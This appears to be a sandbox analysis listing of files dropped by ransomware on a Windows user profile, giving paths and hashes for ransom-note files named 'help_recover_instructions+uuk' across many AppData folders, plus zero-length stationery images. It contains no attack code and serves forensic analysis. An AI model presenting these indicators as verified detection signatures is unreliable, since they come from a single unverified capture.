C:\Users\admin\AppData\Local\Adobe\Reader 9.3\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 62E83F4DD4A36A4538FDF824C0CC8A7F SHA: 3B5A9D3D206DF970447BD1CBF8F8C4D9A1FF88B7 SHA-256: 94B5BF8832ECAFC872EEC0BD3D659DBE431406BB5FC900A627C33FB4B19A6BD1 SHA-512: BC677F273CBF8350274B02B8314B6CBC83B3633A394194A0BE2A057EEE4A4C2B770CD927FB5E3901249018BA60D55F9549BF99A024EBB806F4F88EB612BA056A
C:\Users\admin\AppData\Local\Adobe\Updater6\Install\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: ADAF95889F2427E208432CC45FF24C42 SHA: 482E050B1B5DD04D213EFD2CC37F43C98EE01D3F SHA-256: 4F364A7010419CAAF9CA04B03766DA3E4FC4CA40005A035C042BAD8901CBFA55 SHA-512: E7E42E82BA667B6D70857A416D248A8CAD1268F95C4D1275E4828B8F27AFB9CAD16A4774AB5F26904CBC7F8449819481D7A14AE71C9E08C50B231B70107498D2
C:\Users\admin\AppData\Local\Adobe\Updater6\Install\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 62E83F4DD4A36A4538FDF824C0CC8A7F SHA: 3B5A9D3D206DF970447BD1CBF8F8C4D9A1FF88B7 SHA-256: 94B5BF8832ECAFC872EEC0BD3D659DBE431406BB5FC900A627C33FB4B19A6BD1 SHA-512: BC677F273CBF8350274B02B8314B6CBC83B3633A394194A0BE2A057EEE4A4C2B770CD927FB5E3901249018BA60D55F9549BF99A024EBB806F4F88EB612BA056A
C:\Users\admin\AppData\Local\Adobe\Updater6\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: ADAF95889F2427E208432CC45FF24C42 SHA: 482E050B1B5DD04D213EFD2CC37F43C98EE01D3F SHA-256: 4F364A7010419CAAF9CA04B03766DA3E4FC4CA40005A035C042BAD8901CBFA55 SHA-512: E7E42E82BA667B6D70857A416D248A8CAD1268F95C4D1275E4828B8F27AFB9CAD16A4774AB5F26904CBC7F8449819481D7A14AE71C9E08C50B231B70107498D2
C:\Users\admin\AppData\Local\Adobe\Updater6\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 62E83F4DD4A36A4538FDF824C0CC8A7F SHA: 3B5A9D3D206DF970447BD1CBF8F8C4D9A1FF88B7 SHA-256: 94B5BF8832ECAFC872EEC0BD3D659DBE431406BB5FC900A627C33FB4B19A6BD1 SHA-512: BC677F273CBF8350274B02B8314B6CBC83B3633A394194A0BE2A057EEE4A4C2B770CD927FB5E3901249018BA60D55F9549BF99A024EBB806F4F88EB612BA056A
C:\Users\admin\AppData\Local\Adobe\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: D7A20FF3429F6E2D5FC1FE741A3120E5 SHA: 8B4DD36503BF1B0269070688E9FEDDC92EF20AF1 SHA-256: C53195F4D2A1EB7DE51C5827D909E7249D051EDB2083AC6861EE85294B908E2A SHA-512: 3E631DEC4F79116CA63E47DB5501282CDFA823641997AEB009EBB25B39EF72094EFA0CBA9D6AECBC81E83340BD9BD902FC780B1AF038DB358A07B998DFAD9C62
C:\Users\admin\AppData\Local\Adobe\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 081D32F64A3CF72BFA87932A061AC1A5 SHA: 812116DACA176730FC111039C64F4F842DE13B61 SHA-256: 0B249D35E7F80911EA0A2E96719A4E26B31B9E4CA44B879D6FAD08138EAE4E99 SHA-512: 6DDD7302BD9C82D10A7D61747F5F704D4F2C6E9EF0D8B77F2882B723342A33C0B44D42108D9A7FBDCFE4FDDA33DA0A1FF836F631FF6371D7368E857E1AF2B4C7
C:\Users\admin\AppData\Local\ElevatedDiagnostics\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\ElevatedDiagnostics\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\EmieBrowserModeList\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\EmieBrowserModeList\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\EmieSiteList\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\EmieSiteList\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\EmieUserList\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\EmieUserList\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Google\Chrome\User Data\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Google\Chrome\User Data\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Google\Chrome\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Google\Chrome\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Google\CrashReports\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Google\CrashReports\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Google\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: BEA7E5F6A9B4EBA8F78EE2086C0F3DED SHA: F77F5E3988AA2D2ACA9B4ECDB92C2CE24C9FF638 SHA-256: 231E8D8FC9D707A28EF8BD82AB7D2AD0F30CE0ECA61D4A481647E5D029E434B0 SHA-512: A044B7980FD959E6446143EFEDF7E763F60906190A9AC8A28FAB6CDA38875A5D97C35F007E74974C8890C8B9862095593FDB6407253CFADC4CD8BCA280FA8E71
C:\Users\admin\AppData\Local\Google\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 3F3EFA647C43EADA869B7FAB98E55AA2 SHA: 291EB91C97DC3CED2221B01FFEE2A3409A377F2B SHA-256: 53887D38620C4994817A6C8087C877426EC7A7FCE96D7B2D59B0925843B47379 SHA-512: 0E9EBE55F7253CAE6A7BDEB6B7A1E84E1957DEA11451EBCBE8F7805E92ABF8E5400ED21D09E24AD56803AC331BDC75ACCB33E2B4AAFD4B5F3ADDE571B514B888
C:\Users\admin\AppData\Local\Microsoft\Credentials\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\Credentials\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Feeds Cache\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\Feeds Cache\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Feeds\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\Feeds\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt	Type: data MD5: C51AA734E0D25C97F2ABA926FBC8A506 SHA: 15E13E8BA56E24F427996EF74B27B4FA2CA95D3A SHA-256: 81B4B95C2B00D3A5DF499959784C8AB1F3C7D5D578378F5A8CC7790D3E4117DD SHA-512: 7C18DB3A39D272ED5CA2D7AFD05883FA333C723B826A0B7066AFBFBA542D8558B2711ED5689AE55A7623701BFD484E5A63A81201D0646BDF19668D40E79D8ED0
C:\Users\admin\AppData\Local\Microsoft\Media Player\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\Media Player\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\OFFICE\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\OFFICE\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\PlayReady\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Microsoft\PlayReady\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg	Type: data MD5: C522D67CDCF7E6277B41C6F1E824DFDA SHA: 73AC8FB210AFF0E683AB57F151D55CAB93871091 SHA-256: B9E58C31C9BE03A866C16A5EBEE2B38281FABBA35595647572DB9801B16E4A72 SHA-512: 1FB0CC233862EC6E8C9FCABFBD4BE81641BAF8175C90BD531848C4B21332A346A99419E8490AD78F308DDE5C7F84FF6987C884D61DBA2B7A76776389EC089F29
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg	Type: data MD5: BFBF56443F4664F929CAD8D084818E49 SHA: 68186B1F7A9BCD061F90E9E0B41533F25CB369C5 SHA-256: 43B0B2240AB119F2CC0B090D093671D3A43377B365C54DEB26CAD22ED8863A20 SHA-512: 4B7E58F367874E00741191EE93042B28E1C36E3906B80D47F45A6784FC095853A1228C4CC6A9C6981CF7D40921DC6DE5EBC29DABABE893A0F998B5C0C08A0D48
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg	Type: data MD5: DE845AE4BBE69E5DD6D78DC3F88E776A SHA: E97E647EEE775D9DE6F0B0DB1031E93A3D30E4F8 SHA-256: FA98A7D893508D2746DD63C710A06066D39934A47A9D8ACCAF28E54A34E1A7D7 SHA-512: 21EB99422BA114868F7934A14CB51E2F13E6354BB9723EF6BCCF6BE583796E2FBE4CFF71D477F4AA833BE372E2089188FF43AF2233F3D747EB695D847C3DD41A
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg	Type: data MD5: 2E5DAE267E1CBD6B6D328D66DF4F5FC7 SHA: 591C4F91F67E26957D276592C9C70486DFFFCDD1 SHA-256: 45C06A040C19DEEBA59752242F80D1075BFC8AAA7E4CDD16A141D34B895BD493 SHA-512: A80EA0EF907769D546269CA67B14C203C6898CFB10D57E07241870DB1290E2840E41230D4EDF981AE3EB4B6B6046038EB1BE7A3A4B730762C861B41B2062A96C
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Microsoft\Windows Mail\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
